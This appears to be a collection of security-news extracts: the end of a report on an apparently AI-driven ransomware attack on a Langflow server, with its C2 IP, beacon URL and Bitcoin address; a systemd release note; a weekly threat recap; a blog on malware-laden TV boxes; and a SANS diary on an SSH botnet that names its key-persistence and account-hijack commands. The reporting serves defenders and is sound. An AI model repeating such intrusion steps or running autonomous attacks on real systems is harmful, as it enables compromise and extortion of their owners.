a hacked server cannot phone home. Because attackers can now weaponize a fresh advisory in hours, Sysdig argues that watching for bad behavior at runtime matters more than racing to patch. Sysdig's published indicators for this operation include: Entry point: CVE-2025-3248 (Langflow unauthenticated remote code execution) Command-and-control: 45.131.66[.]106, with a beacon to hxxp://45.131.66[.]106:4444/beacon every 30 minutes Claimed staging server: 64.20.53[.]230 Ransom Bitcoin address: 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy; contact e78393397[@]proton[.]me; ransom table named README_RANSOM Sysdig calls JADEPUFFER a warning sign rather than a crisis. None of the individual moves was clever or new. What is new is that a model stitched them into a complete attack against a neglected server, on its own. Expect more of the same as agent tools mature, and treat any exposed server, config store, or database admin login as something a machine will probe, not just a person.
thehackernews.comJul 2, 2026extracted
The systemd 261 release brings a software TPM, new OS installer
The systemd 261 release brings a software TPM, new OS installer Linux distributions that ship systemd as their init system now have a new version to track. The systemd 261 update adds a cloud metadata subsystem, carries process state through kexec reboots, and continues a long-running effort to load external libraries on demand. Cloud metadata gets a local interface systemd 261 adds an IMDS subsystem for cloud instance metadata. A daemon, systemd-imdsd, provides a local Varlink API that gives programs access to instance metadata services. A hardware database file recognizes public clouds by their SMBIOS information and records how to reach metadata on each node. The recognized clouds include Amazon EC2, Microsoft Azure, Google Compute Engine, Hetzner, Oracle Cloud, Scaleway, Tencent Cloud, Alibaba ECS, and Vultr. A companion tool, systemd-imds, acts as a client and imports metadata fields into system credentials for later services to consume. Acquired metadata is measured before import. Operators can lock down network access to cloud metadata services through a build option. State survives a kexec reboot PID1 now supports the kernel’s Live Update Orchestration and Kexec Handover mechanisms when they are present and enabled. System units’ file descriptor stores can persist through a kexec, and units receive their stashed file descriptors back afterward where the kernel supports the descriptor type. Units enable this by setting FileDescriptorStorePreserve=yes. User session managers and systemd-nspawn containers gained matching support, letting user units and container payloads carry state across session restarts and kexec reboots. TPM and boot changes A new service, systemd-tpm2-swtpm.service, can run IBM’s swtpm as a software TPM for systems that lack physical hardware, gated behind a kernel command line option. A new condition, ConditionSecurity=measured-os, checks whether a system booted with measured-boot semantics. systemd-stub maintains a boot secret derived from a persistent EFI variable and passes it to the OS, for fallback codepaths where a local TPM is absent. systemd-boot now stores the prior boot loader binary as a fallback when installing a new version. Other additions A new component, systemd-sysinstall, implements a textual OS installer built on Varlink calls to systemd-repart, bootctl, and systemd-creds. systemd-sysupdate left experimental status and moved to /usr/bin/. systemd-oomd gained support for OOM rulesets. The manager exposes a ReloadCount property over D-Bus and Varlink. systemd-networkd added a DHCP relay backend and a networkctl command to dump acquired DHCP leases. Removals and dependency work Most external library linking now happens through dlopen(), covering libgnutls, libcurl, libcrypto, libssl, libcryptsetup, and others, leaving libc as the remaining direct external link. Support for udev’s database version 0 was removed, which ends support for live upgrades from releases older than v247. systemd-nspawn’s –user= option was renamed to –uid=, with the old form deprecated. The required musl version rose to 1.2.6 for builds that use it. The project plans to remove the /run/boot-loader-entries/ directory support and the experimental systemd-sysupdated D-Bus API in the 262 release. Must read: 25 open-source cybersecurity tools that don’t care about your budget GitHub CISO on security strategy and collaborating with the open-source community Subscribe to the Help Net Security ad-free monthly newsletter to stay informed on the essential open-source cybersecurity tools. Subscribe here!
helpnetsecurity.comJun 21, 2026extracted
⚡ Weekly Recap: Linux Flaws, Defender 0-Days, Router Botnets, and Supply Chain Chaos
Monday recap. Same mess, new week. A sketchy dev tool got people pwned, old bugs came back from the dead, and security products somehow needed protecting from themselves. A bunch of companies spent the week checking old boxes and forgotten servers they should've patched years ago. Good times. Phishing crews are getting smarter too - less obvious scam junk, more targeted stuff that actually looks real. Meanwhile, botnets are grabbing anything exposed to the internet like it's free candy. The Internet's still a dumpster fire. Let’s get into it. ⚡ Threat of the Week GitHub Breached via Nx Console VS Code Extension—GitHub officially confirmed that the breach of its internal repositories was the result of a compromise of an employee device involving a poisoned version of the Nx Console Microsoft Visual Studio Code (VS Code) extension. The attack is said to have allowed the threat actor, a cybercriminal group known as TeamPCP, to exfiltrate about 3,800 repositories. GitHub said it has taken steps to contain the incident and rotated critical secrets, adding it's continuing to monitor the situation for follow-on activity. The Nx team revealed that the extension, nrwl.angular-console, was breached after one of its developers' systems was hacked in the wake of the recent TanStack supply chain attack. Other companies that were impacted by the TanStack compromise include OpenAI, Mistral AI, and Grafana Labs. Grafana Labs was also the target of an extortion attempt, but the company said it refused to pay the hackers who had threatened to release the company's codebase. The incidents are just some examples of the long tail of downstream victims emerging from the Mini Shai-Hulud campaign. This, coupled with TeamPCP's public release of the Shai-Hulud code, marks a significant evolution in software supply chain threats, as it gives attackers a ready-made blueprint for fleshing out similar worms targeting open-source repositories and developer environments. 80% of Security Teams Know OAuth Security Is Urgent. Half Are Doing Nothing Manual OAuth reviews don’t scale, and the rapid adoption of AI agents is making it worse. Material’s OAuth Threat Remediation Agent continuously monitors every connection across your cloud workspace, classifies risk, and automatically kills malicious ones before they become incidents. Close the Gap Today ➝ 🔔 Top News Microsoft Took Down Fox Tempest—Microsoft has cracked down on Fox Tempest, a cyber threat actor that fueled Rhysida ransomware attacks and other infections involving Oyster, Lumma Stealer, and Vidar. The group operates upstream in the malware and ransomware supply chain, acting as an enabler and providing tools for other threat actors to carry out attacks. This included a fraudulent code-signing service that let cybercriminals deploy malware "through the front door" without being detected. While bad actors have been known to resell code-signing certificates for at least a decade, Fox Tempest's operation stood out because it provided a scalable service for extortion, phishing, SEO poisoning, or malware-laced advertising. 9-Year-Old Linux Kernel Flaw Enables Root Command Execution—A new vulnerability disclosed in the Linux kernel remained undetected for nine years. The vulnerability, tracked as CVE-2026-46333 (CVSS score: 5.5), is a case of improper privilege management that could permit an unprivileged local user to disclose sensitive files and execute arbitrary commands as root on default installations of several major distributions like Debian, Fedora, and Ubuntu. The issue was introduced in November 2016. Microsoft Warned of Two Actively Exploited Defender Vulnerabilities—Microsoft has disclosed that a privilege escalation and a denial-of-service flaw in Defender have come under active exploitation in the wild. While CVE-2026-41091 could allow an attacker to gain SYSTEM privileges, CVE-2026-45498 relates to a case of denial-of-service. Although Microsoft has not formally confirmed, the vulnerability descriptions for CVE-2026-41091 and CVE-2026-45498 overlap with those of RedSun and UnDefend, two Defender zero-days that were disclosed by Chaotic Eclipse (aka Nightmare-Eclipse) last month. Newly Disclosed Drupal Core Flaw Under Attack—A critical security flaw impacting Drupal Core has come under active exploitation within days of public disclosure. The vulnerability in question is CVE-2026-9082 (CVSS score: 6.5), an SQL injection vulnerability affecting all supported versions of Drupal Core. Drupal acknowledged that "exploit attempts are now being detected in the wild." Thales-owned Imperva said it has observed over 15,000 attack attempts targeting almost 6,000 individual sites across 65 countries. Claude Mythos AI Finds 10K High-Severity Flaws in Popular Software—Anthropic revealed that Project Glasswing has helped uncover more than 10,000 high- or critical-severity vulnerabilities across some of the most "systemically" important software across the world since the cybersecurity initiative went live last month. Of these vulnerabilities, 6,202 have been classified as high- or critical-severity flaws impacting more than 1,000 open-source projects. Subsequent analysis of these vulnerability candidates has identified that 1,726 are valid true positives. As many as 1,094 flaws are assessed to be either high- or critical-severity. In total, these efforts have led to 97 findings being patched upstream and 88 advisories being issued. Cisco Patched CVSS 10.0 Secure Workload Flaw—Cisco rolled out updates for a maximum-severity security flaw impacting Secure Workload that could allow an unauthenticated, remote attacker to access sensitive data. Tracked as CVE-2026-20223 (CVSS score: 10.0), the vulnerability arises from insufficient validation and authentication when accessing REST API endpoints. "An attacker could exploit this vulnerability if they are able to send a crafted API request to an affected endpoint," Cisco said. "A successful exploit could allow the attacker to read sensitive information and make configuration changes across tenant boundaries with the privileges of the Site Admin user." Microsoft Released Mitigations for YellowKey—Microsoft released a mitigation for a BitLocker bypass vulnerability named YellowKey following its public disclosure last week. The zero-day flaw, now tracked as CVE-2026-45585, carries a CVSS score of 6.8. It has been described as a BitLocker security feature bypass. The issue impacts Windows 11 version 26H1 for x64-based Systems, Windows 11 Version 24H2 for x64-based Systems, Windows 11 Version 25H2 for x64-based Systems, Windows Server 2025, and Windows Server 2025 (Server Core installation). Microsoft noted that successful exploitation could permit an attacker with physical access to sidestep the BitLocker Device Encryption feature on the system storage device and gain access to encrypted data. 🔥 Trending CVEs Bugs drop weekly, and the gap between a patch and an exploit is shrinking fast. These are the heavy hitters for the week: high-severity, widely used, or already being poked at in the wild. Check the list, patch what you have, and hit the ones marked urgent first — CVE-2026-48172 (LiteSpeed User-End cPanel Plugin), CVE-2026-34926 (Trend Micro Apex One), CVE-2026-20223 (Cisco Secure Workload), CVE-2026-41091, CVE-2026-45498, CVE-2026-45584 (Microsoft Defender), CVE-2026-46333 (Linux Kernel), CVE-2026-9082 (Drupal Core), CVE-2026-45585 (Microsoft Windows BitLocker), CVE-2026-2743 (SEPPMail), CVE-2026-7301, CVE-2026-7302, CVE-2026-7304 (SGLang), CVE-2026-29205 (cPanel), CVE-2026-8178 (Amazon Redshift JDBC driver), CVE-2026-8053 (MongoDB), CVE-2026-45829 aka ChromaToast (ChromaDB), CVE-2026-8153 (Universal Robots PolyScope 5), CVE-2026-3102 (ExifTool), CVE-2026-9110, CVE-2026-9111, from CVE-2026-8511 through CVE-2026-8522 (Google Chrome), CVE-2026-45434 (Apache OFBiz), CVE-2026-33000, CVE-2026-34908, CVE-2026-34909, CVE-2026-34910, CVE-2026-34911 (UniFi OS), CVE-2026-45401 (Open WebUI), CVE-2026-9256, CVE‑2026‑8711 (F5 NGINX Plus and NGINX Open Source), CVE-2026-20239 (Splunk Enterprise and Splunk Cloud Platform), CVE-2026-46376 (FreePBX), CVE‑2026‑6637 (PostgreSQL), and CVE-2026-35194 (Apache Flink). 🎥 Cybersecurity Webinars Learn How Attackers Use AI to Supercharge DDoS Efficiency (and How to Stop It) → Adversaries are weaponizing AI to exploit network blind spots, auto-generate evasion scripts, and bypass traditional defenses with surgical precision. This webinar bridges the gap between AI-driven exploitation and cloud resilience, offering data-driven insights into how attackers maximize DDoS success rates. Join us to move beyond theory, leverage AI for non-disruptive security testing (CTEM), and transition your team from reactive mitigation to automated, continuous resilience. Beyond the Zero-Day: Hunting for Threats That Don't Need an Exploit → Zero-day exploits are no longer the ultimate metric of cyber risk. Today, sophisticated adversaries bypass traditional defenses entirely by leveraging identity flaws, living-off-the-land techniques, and AI automation that don't rely on unpatched software. This session moves beyond the zero-day obsession to expose how attackers operationalize modern post-compromise tactics—and how security teams can pivot from reactive patching to proactive, behavioral threat hunting. 📰 Around the Cyber World Vulnerability Exploitation Overtakes Compromised Credentials in a Long Time —Vulnerability exploitation has overtaken compromised credentials for the first time in nearly two decades as the most common initial access vector for data breaches, per Verizon. Nearly a third (31%) of data breaches over the past year started with vulnerability exploitation, up from 20% in 2024. Credential abuse declined from 22% to 13%. What's more, only 26% of critical vulnerabilities listed in the U.S. Cybersecurity Infrastructure and Security Agency Known Exploited Vulnerabilities (KEV) catalog were fully remediated by organizations in 2025, a drop from 38% the previous year. "The median time for full resolution went up to 43 days, almost two weeks more than the previous year’s 32 days," the report said. "In the median case, organizations had 50% more critical vulnerabilities to patch in this year’s reporting dataset compared to the previous year." Ransomware accounted for 48% of all breaches last year, up from 44% in 2024. But in a positive development, ransom payments have continued to decline, with the median payment sliding from $150,000 in 2024 to almost $140,000. Attackers Go After India's Education Ecosystem —Threat actors are abusing student data within India's education ecosystem, spanning educational institutions, third-party vendors, and online services, for phishing, impersonation, social engineering, and financially motivated fraud operations. "Attackers commonly leverage exposed or misused student information to create highly convincing scams related to admissions, scholarships, internships, fee payments, and academic services," CYFIRMA said. "In several instances, threat actors exploited trusted educational branding, fraudulent portals, and insider access to obtain credentials, financial information, or direct payments. Additionally, some cases indicated the misuse of student-linked bank accounts within broader fraud and mule account operations." RondoDox Adds ASUS Router Flaw to its Arsenal —The operators of the RondoDox botnet have incorporated CVE-2018-5999 (CVSS score: 9.8), a critical ASUS router flaw, to their arsenal, marking the first observation of in-the-wild exploitation of the vulnerability. The activity was first detected on May 17, 2026, against its honeypots. "The attack pattern: payloads that set the ateCommand_flag to 1, enabling the infosvr interface to accept arbitrary configuration changes," VulnCheck CTO Jacob Baines said in a post on LinkedIn. Fake Microsoft Teams Sites Deliver ValleyRAT —Fake Microsoft Teams distribution sites shared on X are being used to trick unsuspecting users into downloading a trojanized installer packaged as a ZIP archive, ultimately leading to the deployment of ValleyRAT, a malware associated with a Chinese cybercrime group called Silver Fox. "The delivered payload leverages a DLL sideloading chain via a legitimate executable (GameBox.exe) developed by Tencent, ultimately deploying a ValleyRAT variant," K7 Labs said. "This malware campaign stands out for its clean execution chain, combining social engineering with staged payload delivery, in-memory decryption, and stealthy persistence mechanisms." Malicious Activity Targeting Malaysian Entities —An attacker-controlled infrastructure hosted on Microsoft Azure infrastructure in the Malaysia West region has been used to conduct a targeted intrusion campaign against multiple Malaysian organizations, per Oasis Security. "The operation demonstrates a high degree of operational planning, with the attacker developing purpose-built Python tooling for each target — covering internal network enumeration, database access, and external data exfiltration," the company said. The infrastructure hosts target-specific Python scripts, webshell deployment tools, a Laravel remote code execution exploit chain, and source code for custom command-and-control (C2) components. Texas Attorney General Sues Meta Over WhatsApp Encryption Claims —The Texas Attorney General has sued Meta over allegations that the company's WhatsApp messenger doesn't provide the end-to-end encryption (E2EE) it has long claimed. "Reports suggest that employees of WhatsApp have been able to access user communications," the Office of the Texas Attorney General said. "Additional reporting and investigations indicate that message content can be pulled and viewed after the message has been sent. This is a complete and total misrepresentation of Meta’s privacy policies." The lawsuit hinges on a report from Bloomberg from last month about how the U.S. Commerce Department's Bureau of Industry and Security had abruptly closed an investigation into allegations that Meta could access encrypted WhatsApp messages. Preliminary findings from the department claimed that "there is no limit to the type of WhatsApp message that can be viewed by Meta." Meta has called the allegations "baseless." FIOD Arrests Two in Connection with Stark Industries —The Netherlands Fiscal Intelligence and Investigation Service (FIOD) arrested two men and seized 800 servers in connection with a web hosting company that enabled cyber attacks, interference operations, and disinformation campaigns. The arrested individuals included a 57-year-old man from Amsterdam and a 39-year-old man from The Hague. Although the name of the company was not explicitly mentioned, it is assessed to be Stark Industries, which was sanctioned by the E.U. in May 2025. Following the sanctions, a significant chunk of the technical infrastructure was transferred to a Dutch-based entity known as THE.Hosting aka WorkTitans. "This new company actually acts as a cover for the sanctioned entities," FIOD said. "The director and (indirect) sole shareholder of this company is the 57-year-old suspect." A second unnamed Dutch company is said to have played a facilitating role. "This company, of which the 39-year-old is a suspected director and sole shareholder, ensures that the servers of the former new company are connected to the internet," FIOD added. UNG0002 Targets Chinese Educational Sector —The Chinese educational sector has become the target of a new campaign conducted by UNG0002 as part of a spear-phishing campaign codenamed Operation Dragon Whistle. "What makes this campaign particularly effective is the precision of its social engineering," Seqrite Labs said. "The threat actor did not use a generic lure — they specifically identified that Changzhou University conducts mandatory annual fitness assessments where failure directly impacts graduation eligibility. This creates an environment of urgency and compliance that significantly increases the probability of victim engagement." The emails have been found to distribute ZIP archives that ultimately lead to the deployment of Cobalt Strike Beacon. Void Botnet Uses Ethereum Smart Contracts for C2 —A new botnet malware called Void Botnet uses Ethereum smart contracts for seizure-resistant command-and-control (C2). It's a Rust-based malware that's advertised on cybercrime forums by a developer operating under the handle TheVoidStl. "Based on the seller's documentation and panel screenshots, Void Botnet is a Rust-native loader with two command-and-control modes in the same binary," Qrator Labs said. "The first mode routes commands through Ethereum smart contracts: the operator writes instructions to a contract, and infected machines check it at regular intervals, picking up new tasks within three to five minutes. The second mode connects machines directly to the operator's web panel, with tasks completing in under thirty seconds. The operator switches between them at any time by updating the contract." The botnet works by writing commands to smart contracts, bots polling public RPC endpoints, and C2 infrastructure that is hard to take down. Proton Debuts AI Access Tokens in Proton Pass —Proton Pass, a secure, end-to-end encrypted (E2EE) password manager, has added credential sharing through AI access tokens, allowing users to give AI agents access to items it's permissioned to and monitor their activity. "AI access tokens are our newest secure sharing option to bring password management into the age of agentic AI," Proton said. "Every time an AI agent uses an access token, this is logged, and a reason for the access must be provided. For extra security, you can also set an expiration for each token, from one hour to one year, after which it can no longer be used." DevilNFC and NFCMultiPay Android NFC Relay Malware Spotted —Two new Android NFC relay malware families named DevilNFC and NFCMultiPay have been observed targeting European and LATAM banking customers. "These two NFC relay toolkits are being developed and operated outside the Chinese-speaking MaaS ecosystem: DevilNFC carries an exclusively Spanish-speaking attribution, while NFCMultiPay's developer fingerprint is Portuguese (Brazilian)," Cleafy said. "Local groups are no longer buying access to Chinese platforms; they are building their own." It's assessed that the malware families may have been developed with assistance using generative artificial intelligence (AI). Both malware families are designed to collect the victim's card PIN. "DevilNFC further locks the victim inside the malicious interface via Kiosk Mode, preventing any escape while the relay completes," the Italian company said. "DevilNFC employs an asymmetric architecture in which a single APK serves both roles in a relay attack: a passive reader on the victim's device and a system-level card emulator on the attacker's rooted device, achieved via a hooking framework that intercepts NFC traffic below the Android API layer." DevilNFC overlaps with an NGate variant documented by ESET last month. The malicious apps are distributed via SMS or WhatsApp messages, directing victims to fake landing pages impersonating Google Play Store listings. TAX#TRIDENT Uses Indian Income Tax Lures —A new campaign dubbed TAX#TRIDENT is using Indian Income Tax-themed lures to target Windows endpoints via three delivery paths. The campaign starts with fake tax assessment lures and then moves victims toward ZIP files, VBScript downloaders, or PHP-looking web endpoints that actually return script content," Securonix said. "The first branch uses a ZIP file and a signed ClientSetup installer. Once executed, the installer creates a hidden client tree, adds service and driver persistence, and starts network communication. The second branch uses 'Assessment_Order.vbs.' The script shows a tax assessment decoy image, downloads the same ClientSetup payload, writes a new 'YTSysConfig.ini,' and runs the payload hidden. The third branch uses a PHP-looking endpoint that returns VBScript. That script downloads more stages from S3, disguises a VBS file as a PNG image, changes UAC prompt behavior, and silently installs a signed ManageEngine UEMS / Endpoint Central agent." CISA Launches KEV Nomination Form to Report Exploited Bugs —The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has introduced an online Nomination Form that lets researchers, vendors, and industry partners submit known exploited vulnerabilities (KEVs) directly so as to "quickly identify, validate, and share KEVs, critical threat information." Exploitation of Four-Faith Router Flaw —Attackers are exploiting CVE-2024-9643 (CVSS score: 9.8), a critical authentication bypass flaw in Four-Faith F3x36 industrial cellular routers, as part of a large-scale campaign since mid-May 2026 to turn fold compromised devices into botnets for further campaigns. CrowdSec said it has observed 139 attacking IP addresses through May 18, 2026. "Exploitation was first observed on April 20 and escalated to the point of being reclassified as mass exploitation on May 12, a strong signal that attackers are operationalizing this flaw at scale," it added. Chinese-Language PhaaS Ecosystem Detailed —An analysis of a dozen current phishing-as-a-service (PhaaS) offerings in the Chinese underground has found that they have shifted away from static password harvesting towards real-time interception and tokenization via live administration panels, allowing attackers to capture one-time passcodes (OTPs) and bypass multifactor authentication (MFA) instantly. The services, such as YY Lai Yu, primarily target non-Chinese entities, with advertisements regularly posted to Telegram rather than channels such as WeChat (Weixin) or Tencent QQ. A crucial aspect of these operations is their exploitation of digital wallet provisioning to monetize stolen payment details. Attackers have been found to leverage captured credentials and OTPs to provision the victim's card into a digital wallet on an attacker-controlled device. Once tokenized, the card can be used for high-value transactions, contactless payments, and ATM withdrawals. "Instead of simply gaining account access, these operations focus on exploiting digital wallet provisioning to transform stolen payment data into tokenized assets within ecosystems," Google said. "This shift—combined with the use of encrypted delivery channels like RCS and iMessage to bypass traditional carrier security filters on SMS messages—represents an emerging development where the goal is no longer just a login, but securing direct, unauthorized control over a victim's financial accounts." 🔧 Cybersecurity Tools Bumblebee → It is an open-source security tool for macOS and Linux designed to find software supply-chain vulnerabilities on developer computers. It acts as a lightweight, read-only scanner that audits metadata files, manifests, and configurations rather than executing code. This allows it to safely check local language packages, web browser extensions, text editor add-ons, and AI tool configurations for known security exposures without running potentially malicious install scripts. Claude-BugHunter → It is an open-source add-on that configures Anthropic’s Claude Code command-line tool into a specialized security assistant. It equips the AI with pre-built vulnerability patterns, attack techniques, and reporting templates, automating the process of finding and documenting security flaws during authorized testing. Disclaimer: This is strictly for research and learning. It hasn't been through a formal security audit, so don't just blindly drop it into production. Read the code, break it in a sandbox first, and make sure whatever you’re doing stays on the right side of the law. Conclusion Patch the easy stuff before it becomes a bigger problem next week. The old bugs everyone ignored? Attackers didn’t ignore them. They never do. Right now, the internet feels held together with tape and luck. Every week, there’s a new mess, a new scam, or some old box getting dragged into a botnet. See you next Monday.
thehackernews.comMay 25, 2026extracted
Malicious TV boxes: how a cheap “SuperBox” turns your home into a proxy node for cybercriminals | Kaspersky official blog
Netflix, Apple TV+, Disney+, Hulu, Amazon Prime, YouTube Premium… The average law-abiding family today pays for five to 10 subscriptions just to watch their shows of choice, with the monthly bill easily crossing the hundred-dollar mark. It’s no surprise, then, that social media and online marketplaces are seeing a surge in demand for the “magic boxes” that popped up at the end of 2025: Android-powered TV boxes that promise to unlock thousands of channels and every streaming service subscription-free for a one-time purchase. Ads for these devices are flooding TikTok and Instagram: smiling influencers unbox the SuperBoxes, plug them into a TV, and browse endlessly through channels. It looks like the ultimate life hack against subscription fatigue, right? In reality, it’s one of the easiest ways to invite a botnet into your home network. What’s wrong with these cheap TV boxes? Stories about malicious TV boxes have surfaced before, but right now, their marketing has reached a truly alarming scale. At the end of 2025, analysts examined several models of the popular SuperBox device available from major retail stores and online marketplaces. The findings were deeply concerning: immediately upon powering up, the devices began pinging the servers of the Chinese messaging app Tencent QQ, as well as the Grass proxy service — effectively renting out the owner’s internet bandwidth to third parties. Inside the firmware, researchers discovered applications completely uncharacteristic of a media player: a network scanner, a traffic analyzer, and tools for DNS hijacking. Consequently, the device not only streams pirated content but also scans the local network for other targets (including industrial SCADA interfaces), and stands ready to participate in DDoS attacks. The SuperBoxes were also found to contain folders with the telltale name “secondstage”, a textbook indication of multi-stage malware. More recently, in April 2026, the Darknet Diaries podcast featured an interview with a security researcher known by the alias D3ada55, who shared plenty of intriguing details about these boxes — including the fact that they were still openly sold on major platforms like Amazon, Walmart, and Best Buy. The infection chronicles: BADBOX to Keenadu The SuperBox case is far from the only instance where Android devices have been turned into botnet nodes — or sold infected right out of the box. Here’s a look at the most recent cases: BADBOX 2.0. In July 2025, Google filed a lawsuit against the operators of a botnet that compromised over 10 million Android devices — mostly cheap TV boxes, tablets, and projectors lacking Google Play Protect certification. As we reported earlier, BADBOX 2.0 specifically targets TV boxes, operating simultaneously as a proxy network and an ad fraud engine. Kimwolf. In December 2025, the QiAnXin XLab team uncovered a DDoS botnet that had hijacked around 1.8 million Android devices. The infected hardware included generic models from off-brand manufacturers sporting high-profile names like TV BOX, SuperBox, XBOX, SmartTV, and others. The infection footprint was massive, with compromised devices shipped worldwide. Among the hardest-hit countries were Brazil, India, the U.S., Argentina, South Africa, the Philippines, and Mexico. Keenadu. Our experts discovered this malware lurking in the firmware of brand-new devices back November 2025, though it didn’t gain widespread attention until after we published a study about it in February 2026. Keenadu masquerades as legitimate system components, embedding itself even into facial-recognition unlock apps, potentially granting attackers access to biometrics, banking data, and personal messages. All of these stories share the same origin: the Triada Trojan, first documented by our researchers back in 2016 and dubbed at the time “one of the most advanced mobile Trojans”. Over the past decade it has evolved from a standard piece of malware into a modular backdoor baked directly into firmware during manufacturing. How the infection scheme works Manufacturers of cheap TV boxes cut corners on absolutely everything: Google Play Protect certification, firmware audits, and security updates. Many of these devices run on the Android Open Source Project without any security guarantees whatsoever. Somewhere along the supply chain — whether at the factory, through a middleman, or at a distributor — a backdoor gets injected into the firmware image. Our experts suspect that the manufacturer itself might not even be aware of the compromise. The sheer scale of the infection turns millions of identical boxes into the perfect foundation for a botnet: every compromised device represents a unique IP address that can be rented out to anyone. Botnet operators like Kimwolf monetize this not only through distributed DDoS attacks but also by reselling the bandwidth of infected smart TVs and streaming boxes. What this means for you An infected TV box sits right in your living room, connected to your home Wi-Fi. That means it can see smartphones running banking apps, network-attached storage (NAS) units holding family archives, IP cameras, smart locks, work laptops, and any other the devices connected to your Wi-Fi network. With this kind of beachhead inside your home network, an attacker can intercept unencrypted traffic, spoof DNS requests, scan ports, and hunt for vulnerabilities on neighboring devices. On top of that, they can use your IP address for fraudulent activity. As a result, in the best-case scenario, your IP will end up blacklisted, and legitimate services will start blocking you for suspicious activity; in the worst-case scenario, law enforcement could come knocking on your door. How to spot a potentially dangerous gadget You should be on alert if a device: Is sold under a no-name brand like T95, X96Q, MX10, TV BOX, SuperBox, or some such Promises free lifetime access to paid premium services for a one-time fee Requires you to disable Google Play Protect, or install third-party APK files during the initial setup Lacks Play Protect certification entirely Is promoted through aggressive spam campaigns on social media How to avoid hosting a botnet node Buy certified TV boxes that feature Google Play Protect, or purchase devices directly from reputable telecom operators and internet service providers. Isolate all smart home devices. Set up a separate Wi-Fi network on your home router for TV boxes, cameras, smart speakers, robot vacuums, and similar gear, while keeping smartphones, NAS units, and computers on the main network. This prevents malware from spreading to your critical gadgets. Regularly update the firmware on all your devices, and don’t forget about your router — it’s another vulnerable link in the chain. Remove any applications from your Android TV box that you didn’t install yourself, especially alternative app stores, Wi-Fi “boosters”, and “system cleaners”. Monitor your traffic. Modern routers and Kaspersky Premium can display which devices are connecting to where. Frequent connections from a media player to servers in China are a major security red flag. Install Kaspersky Premiumon all your devices — it protects against Trojans, and blocks the phishing pages often used to distribute infected APK files. Don’t disable Google Play Protect, and avoid installing APKs from shady sources — this is the primary infection vector that bypasses the official app store. If in doubt, return the TV box. A cheap streaming device isn’t worth risking your biometrics, banking data, or the reputation of your IP address. Want to know how else to protect your smart home devices? Read more in our related posts:
kaspersky.comMay 20, 2026extracted
[Guest Diary] New Malware Libraries means New Signatures, (Fri, May 15th)
Introduction The SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 is one of the most-observed Outlaw / Shellbot artifacts on the public internet. VirusTotal first ingested it on 5 July 2018 [2]. It is the SHA-256 of the authorized_keys file written by the campaign whose persistence comment string is mdrfckr, a campaign documented in handler diaries, vendor reports, and independent honeypot research for nearly seven years. This diary does not announce a new campaign. The file hash, the public key, the mdrfckr comment string, the chattr -ia .ssh defensive disarm, the chpasswd account hijack, and the /tmp/secure.sh competitor cleanup are all well-described in prior reporting [3][4][5][6][7]. What this diary does add is one new data point in an existing lineage: between 14 and 21 April 2026, my DShield sensor [8] observed the mdrfckr campaign using a third libssh client version that has not, to my knowledge, been published as part of this campaign’s hassh chronology. The botnet’s authorized_keys file is unchanged across four years. Its SSH client library is on its third documented major version. Detection rules pinned to the older hasshes will miss the current generation. The point of this diary is to put the prior reports side by side with my April 2026 observation, document the new hassh, and offer detection-engineering guidance for handlers maintaining mdrfckr-aware rules. What is already known I want to be careful to credit the prior work this diary builds on, because the new contribution is small relative to it. The mdrfckr persistence key was first associated with the Outlaw / Dota family by Trend Micro in 2018 [3], with subsequent updates in 2019 and follow-up reporting from Anomali, Yoroi [9], Juniper [10], CounterCraft [11], Cybereason, and Kaspersky. The recon command sequence and the competitor-cleanup playbook are described across that body of work. None of the file or behaviour signatures discussed in this diary are novel. In late 2022 and early 2023, the port22.dk blog [4][7] published a two-part deep dive on the campaign. Part one (data from October–November 2022) observed 12,913 unique IPs writing the mdrfckr key from a network of 10 honeypots. Crucially, the post introduced hassh-based clustering as a defender’s tool: 99.1% of the observed mdrfckr-key writes shared the hassh 51cba57125523ce4b9db67714a90bf6e, which corresponds to the SSH client banner SSH-2.0-libssh-0.6.0 / SSH-2.0-libssh-0.6.3. Part two (data from December 2022 onward) documented the campaign migrating to a second hassh f555226df1963d1d3c09daf865abdc9a, corresponding to SSH-2.0-libssh_0.9.5 / SSH-2.0-libssh_0.9.6, with ~30,000 unique IPs across the new fingerprint and a 94.5% confidence link. Part two also documented two new related command variants: chattr -ia .ssh; lockr -ia .ssh as a separate command, and lockr -ia .ssh run on its own, executed alongside the original key-write command. In May 2023, a SANS ISC diary by Jesse La Grew [5] presented two example sessions writing the same SHA-256, captured via a cowrie-log enrichment script. One session originated from a DigitalOcean datacentre IP; the other from a VPN-fronted Tencent IP. Both sessions executed the post-December-2022 split-command variant. In May / June 2023, Guy Bruneau’s monthly DShield diary [6] noted the same key-write playbook in honeypot data and attributed it explicitly to the Outlaw group via the original Trend Micro reporting. That is the public chronology this observation extends. What the April 2026 sensor saw Between 2026-04-14 01:23:41 UTC and 2026-04-21 02:22:56 UTC, my DShield sensor logged 24 unique source IPs writing the SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to /root/.ssh/authorized_keys (and to other compromised account paths). The cluster wrote 229 authorized_keys modifications across 1,230 SSH sessions and executed 4,133 post-authentication commands. The peak burst occurred on 19 April 2026: 20 of the 24 IPs first connected to the sensor between 06:05:19 UTC and 06:07:30 UTC, a 131-second window. The remaining four IPs appeared on neighbouring days but executed the same playbook with the same key. The defensive-disarm and key-write command observed across every successful session is the post-December-2022 split variant documented by port22 part two: The new data point is the SSH client. The new hassh: libssh 0.11.x Every one of the 24 IPs in the April 2026 cluster advertised the SSH client banner SSH-2.0-libssh_0.11.1 and produced the hassh fingerprint 03a80b21afa810682a776a7d42e5e6fb. This hassh does not match the hashes documented in port22 parts one and two, nor in the May 2023 ISC diary. A hassh is a hash of the SSH client’s advertised cipher, MAC, key-exchange, and compression algorithm lists [12]. Different libssh major versions ship with different default algorithm preferences, so each new libssh version a campaign adopts produces a new hassh. The 2026 hassh 03a80b21afa810682a776a7d42e5e6fb is the third documented entry in this campaign’s libssh version walk, separated from port22’s last published value by approximately three years and one major libssh version (0.9 → 0.10 → 0.11). I do not have a baseline of how prevalent this hassh is across the full DShield sensor population - that is the question I would most like other handlers and DShield operators to help answer. On my single sensor, this hassh accounted for 3,473 SSH log lines across the eight-day window, making it the most active SSH attacker-tooling fingerprint observed during the period. The 24-IP burst: small confirmation of an existing observation Twenty of the 24 cluster IPs first connected within a 131-second window. This is consistent with the coordination behaviour documented at much larger scale by port22, and does not represent a new claim. I mention it only for completeness, and because it has one practical implication for 